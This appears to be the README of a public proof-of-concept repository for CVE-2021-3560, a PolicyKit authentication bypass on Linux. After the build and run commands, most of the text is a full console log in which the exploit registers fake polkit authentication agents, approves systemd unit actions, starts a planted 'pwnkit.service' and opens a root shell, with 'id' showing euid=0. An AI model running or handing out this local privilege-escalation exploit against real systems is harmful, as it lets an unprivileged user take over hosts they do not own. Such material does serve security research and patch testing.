PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)

WinMin/CVE-2021-3560

A C implementation of an exploit for CVE-2021-3560. Blog posts about this exploitation:

Contributors

Code by swing (@WinMin) and Ricter Z (@RicterZ)

Usage

dev@server:/tmp/CVE-2021-3560$ make
dev@server:/tmp/CVE-2021-3560$ ./exploit
pid:264181 - [ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin
pid:264181 - [*] main process running ...
pid:264183 - [*] starting polkit authentication agent ...
pid:264182 - [*] starting polkit authentication agent ...
pid:264185 - [*] starting polkit authentication agent ...
pid:264183 - [*] trying to register authentication agent to polkit ...
pid:264182 - [*] trying to register authentication agent to polkit ...
pid:264183 - [+] polkit authentication agent registered successfully!
pid:264183 - [+] D-Bus message loop now running ..
pid:264185 - [*] trying to register authentication agent to polkit ...
pid:264182 - [+] polkit authentication agent registered successfully!
pid:264182 - [+] D-Bus message loop now running ..
pid:264185 - [+] polkit authentication agent registered successfully!
pid:264185 - [+] D-Bus message loop now running ..
pid:264183 - [*] trying to enable system unit file '/tmp/pwnkit.service' ...
pid:264182 - [*] trying to start systemd service 'pwnkit.service' ...
pid:264185 - [*] trying to reload systemd daemon ...
pid:264183 - [+] received authentication for action 'org.freedesktop.systemd1.manage-unit-files' ...
pid:264183 - [*] sending agent response with cookie: 61-bf243e2d0039ce513f32553f945c80d7-1-dddae4b0320b4030370585c13b6a9985
pid:264182 - [+] received authentication for action 'org.freedesktop.systemd1.manage-units' ...
pid:264182 - [*] sending agent response with cookie: 62-c23ffa64bf9c05a1ca8bf057d56a9dfd-1-8d220cfb275f861dcfacd340fc5a578a
pid:264185 - [+] received authentication for action 'org.freedesktop.systemd1.reload-daemon' ...
pid:264185 - [*] sending agent response with cookie: 63-3b99bb8ff0b6b3ffcb7e6103fbe86073-1-6d47c6a380691defd9c455eba617513d
pid:264181 - [+] file exists, popping root shell ...
pwned-5.0# id
uid=1000(dev) gid=1000(dev) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(dev)
pwned-5.0#
